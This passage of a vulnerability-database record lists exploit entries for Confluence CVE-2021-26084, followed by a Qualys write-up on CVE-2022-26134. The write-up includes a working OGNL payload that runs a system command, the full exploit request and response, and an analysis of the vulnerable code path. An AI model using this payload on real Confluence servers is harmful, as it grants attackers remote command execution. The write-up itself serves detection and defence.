"cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:38", "description": "# CVE-2021-26084\n# confluence\u8fdc\u7a0b\u4ee3\u7801\u6267\u884cRCE\n\n## Code By:Jun_sheng 
@\u6a58\u5b50...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T03:07:28", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-02T13:22:29", "id": "BF930E9B-ED2F-52A3-87ED-2082926ED9B1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:56:51", "description": "# CVE-2021-26084\nCVE-2021-26084, Atlassian Confluence OGNL injection vulnerability\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-20T09:26:02", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T06:37:31", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": 
"2022-07-25T01:08:52", "id": "3B46E8A8-B6A0-5055-9270-F6B2A1F204FD", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T03:02:01", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:29:20", "description": "# Confluence_CVE-2021-26084\nRemote Code Execution on Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T12:19:53", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-26T06:18:41", "id": "4D1ED4A9-C9F8-55A0-8B96-52D4C189331C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-27T08:30:10", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, 
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084"], "modified": "2021-11-23T15:51:23", "id": "CD8CABD7-BE65-5434-B682-F73ABA737C65", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "4B524E35-6179-5923-8FEE-CFFDB1F046D9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-27T07:37:58", "description": "# CVE-2021-26084 \n\n# Introduction\nThis write-up provides an over...", "cvss3": {"exploitabilityScore": 
3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-06T23:24:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2018-11776"], "modified": "2021-11-23T15:51:23", "id": "3926D602-9F67-5EF7-B2D1-A6B2716E1DF5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-01T04:37:44", "description": "# PocList\r\n\r\n\u81ea\u5199\u7684\u6f0f\u6d1ePOC\u548cEXP\u5408\u96c6\u3002\r\n\r\nPOC\u811a\u672c\u6307\u5b9aurl\u6587\u4ef6\u540e\uff0c\u53ef\u591a\u7ebf\u7a0b\u6279\u91cf\u626b\u63cf\u76ee\u6807\u8fdb\u884c\u9a8c\u8bc1\uff1bEXP...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": 
"2021-05-22T05:06:33", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zeroshell", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12725", "CVE-2021-26084", "CVE-2021-36749"], "modified": "2022-04-01T01:33:01", "id": "B992B3E1-DF6B-5594-8A16-ED385E07A24C", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-05T16:21:50", "description": "# Log4j Threat Hunting and Incident Response Resources\n\n## Lates...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-09T08:22:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-34473", "CVE-2021-44228"], "modified": "2022-01-10T19:21:49", "id": "3DF3AA17-94C8-5E17-BCB8-F806D1746CDF", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "qualysblog": [{"lastseen": "2022-06-29T21:59:19", "description": "On June 02, 2022, Atlassian published a [security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. The vulnerability is tracked as [CVE-2022-26134](<https://nvd.nist.gov/vuln/detail/CVE-2022-26134>) with 9.8 CVSSv3 score with multiple proof of concept exploits released by security researchers on GitHub. \n\n[Qualys Web Application Scanning](<https://www.qualys.com/apps/web-app-scanning/>) released QID 150523 on June 08, 2022, to detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n## About CVE-2022-26134\n\nCVE-2022-26134 is an unauthenticated OGNL Injection remote code execution vulnerability affecting Confluence Server and Data Center versions after 1.3.0. 
To exploit a vulnerable server, a remote attacker sends an HTTP GET request with an OGNL payload in the URI. Once exploited, the server lets the attacker execute commands remotely with the privileges of the user account running the Confluence application. The vulnerability is fixed in Confluence versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1.\n\n### OGNL Injection\n\nObject-Graph Navigation Language (OGNL) is an open-source Expression Language (EL) used for getting and setting the properties of Java objects. An OGNL injection occurs when user-supplied data is insufficiently validated and the EL interpreter evaluates it, enabling attackers to inject their own EL code.\n\nIn the case of CVE-2022-26134, the RCE attack is not complex. It can be executed by simply sending the OGNL payload in the request URI. The payload can be crafted to add a custom HTTP response header that carries the output of the executed command.\n\nRCE Payload\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Qualys-Response\",#a))}\n\nBreaking down the above payload: variable `a` is assigned the value of an expression that calls static methods using the `@class@method(args)` syntax. `java.lang.Runtime.getRuntime().exec` runs the `id` command, `IOUtils.toString` reads its standard output as UTF-8, and the result is stored in `a`.\n\nNext, the `ServletActionContext` class from package `com.opensymphony.webwork` (the package referenced in the payload) is used: its `getResponse` method returns the current HTTP response, and `setHeader` writes the output of the `id` command into the custom `X-Qualys-Response` header.\n\n### Exploit POC\n\nREQUEST\n \n \n GET 
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n Host: 127.0.0.1:8090\n User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\n Accept-Language: en-US,en;q=0.5\n Accept-Encoding: gzip, deflate\n Connection: close\n Upgrade-Insecure-Requests: 1\n\nRESPONSE\n \n \n HTTP/1.1 302 \n Cache-Control: no-store\n Expires: Thu, 01 Jan 1970 00:00:00 GMT\n X-Confluence-Request-Time: 1655819234897\n Set-Cookie: JSESSIONID=7AE586C9E49E2301BA33E5A1552D8C6F; Path=/; HttpOnly\n X-XSS-Protection: 1; mode=block\n X-Content-Type-Options: nosniff\n X-Frame-Options: SAMEORIGIN\n Content-Security-Policy: frame-ancestors 'self'\n X-Qualys-Response: uid=2002(confluence) gid=2002(confluence) groups=2002(confluence)\n Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n Content-Type: text/html;charset=UTF-8\n Content-Length: 0\n Date: Tue, 21 Jun 2022 13:47:14 GMT\n Connection: close\n\nOnce the exploit is triggered, the `X-Qualys-Response` HTTP response header contains the output of the `id` system command (here the `confluence` service account), confirming successful exploitation of this remote code execution vulnerability. Note that the status is still a 302 redirect to `/login.action` with `permissionViolation=true`: the OGNL expression was evaluated while the namespace was being resolved, before the unauthenticated request was turned away, so the status code alone says nothing about whether the payload ran; the injected header does.\n\n## Exploit Analysis\n\nWhile analyzing the above RCE request, the Qualys WAS research team came across the Catalina log file in Confluence Server stored at 
`/opt/atlassian/confluence/logs/catalina.YYYY-MM-DD.log` which had multiple entries of web requests sent, along with output from `stdout` and `stderr`. Following is the snippet from the log file printing stack trace for the RCE request:\n\n* * *\n \n \n 07-Jun-2022 10:37:00.565 WARNING [Catalina-utility-4] org.apache.catalina.valves.StuckThreadDetectionValve.notifyStuckThreadDetected Thread [http-nio-8090-exec-17] (id=[347]) has been active for [75,417] milliseconds (since [6/7/22 10:35 AM]) to serve the same request for [http://127.0.0.1:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/] and may be stuck (configured threshold for this StuckThreadDetectionValve is [60] seconds). There is/are [1] thread(s) in total that are monitored by this Valve and\n may be stuck.\n java.lang.Throwable\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1247)\n at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1215)\n at ognl.OgnlParser.primaryExpression(OgnlParser.java:1494)\n at ognl.OgnlParser.navigationChain(OgnlParser.java:1245)\n [..SNIP..]\n at ognl.Ognl.parseExpression(Ognl.java:113)\n at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at 
com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at 
com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227)\n at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162)\n at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)\n [..SNIP..]\n at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)\n at java.base@11.0.15/java.lang.Thread.run(Thread.java:829)\n\n* * *\n\nAnalyzing the stack, `com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)` appears to be the source where the injection occurs. 
Execution then reaches ` com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)`, where the [`execute`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>) method calls the [`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method of the [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class (` com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)`). This appears to be the sink where the OGNL expression is evaluated: it invokes the [`findValue`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) method of the `OgnlValueStack` class (`com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)`), which goes on to parse the OGNL expression through `com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196)` and several other classes. (The linked javadocs are for the Struts 2 / XWork 2 equivalents of these classes; the stack trace shows Confluence\u2019s older `com.opensymphony.xwork` packages, whose behaviour is the same for this code path.)\n\n### Source Code Analysis\n\nTo better understand the execution flow of this RCE vulnerability, we dive into the source code of these classes.\n\nStarting with the [`ServletDispatcher`](<https://docs.atlassian.com/DAC/javadoc/opensymphony-webwork/1.4-atlassian-17/reference/webwork/dispatcher/ServletDispatcher.html>) class:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nServletDispatcher\n\n`getNamespaceFromServletPath` is used to obtain the namespace to which an Action belongs.\n\nFor example, when a malicious request `http://127.0.0.1:8090/<RCE payload>/` is fired, the line ` servletPath.substring(0, servletPath.lastIndexOf(\"/\"));` treats everything before the last trailing slash as the namespace. 
Hence the namespace `<RCE payload>` is created from the malicious request URI.\n\nAs a result, the last trailing slash is an essential component of the exploit; if it is omitted, `lastIndexOf(\"/\")` points at the leading slash, the namespace becomes empty, and the payload is never evaluated.\n\nThis namespace is then used by the `execute` method through the `this.namespace` field inside [`ActionChainResult`](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ActionChainResult.html>):\n \n \n public void execute(final ActionInvocation invocation) throws Exception {\n if (this.namespace == null) {\n this.namespace = invocation.getProxy().getNamespace();\n }\n final OgnlValueStack stack = ActionContext.getContext().getValueStack();\n final String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n final String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n if (this.isInChainHistory(finalNamespace, finalActionName)) {\n throw new XworkException(\"infinite recursion detected\");\n }\n \n\nActionChainResult\n\nHere, the `translateVariables` method of the `TextParseUtil` class is called on `this.namespace`; it replaces every `${...}` occurrence in the expression with the value returned by a call to `OgnlValueStack.findValue`.\n\nMoving on to the [`TextParseUtil`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) class code:\n \n \n package com.opensymphony.xwork.util;\n \n import java.util.regex.Matcher;\n import java.util.regex.Pattern;\n \n public class TextParseUtil\n {\n public static String translateVariables(final String expression, final OgnlValueStack stack) {\n final StringBuilder sb = new StringBuilder();\n final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n final Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n final String g = m.group(1);\n final int start = m.start();\n String value;\n try {\n final Object o = stack.findValue(g);\n value = ((o == null) 
? \"\" : o.toString());\n }\n catch (Exception ignored) {\n value = \"\";\n }\n sb.append(expression.substring(previous, start)).append(value);\n previous = m.end();\n }\n if (previous < expression.length()) {\n sb.append(expression.substring(previous));\n }\n return sb.toString();\n }\n }\n \n\nTextParseUtil\n\n[`translateVariables`](<https://struts.apache.org/maven/struts2-core/apidocs/index.html?com/opensymphony/xwork2/util/TextParseUtil.html>) method here takes two parameters `expression` which is basically a string which hasn\u2019t been translated and secondly a `value stack` which allows dynamic OGNL expressions to be evaluated against it.\n\nInside `final Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");` class `Pattern` defines a pattern to be searched and then it\u2019s created using `Pattern.compile()` method.\n\nIn Java `\\` single backslash is an escape character for strings. Hence `\\\\` double backslash are used in above regex `\\\\$\\\\{([^}]*)\\\\}` to escape $, {, } 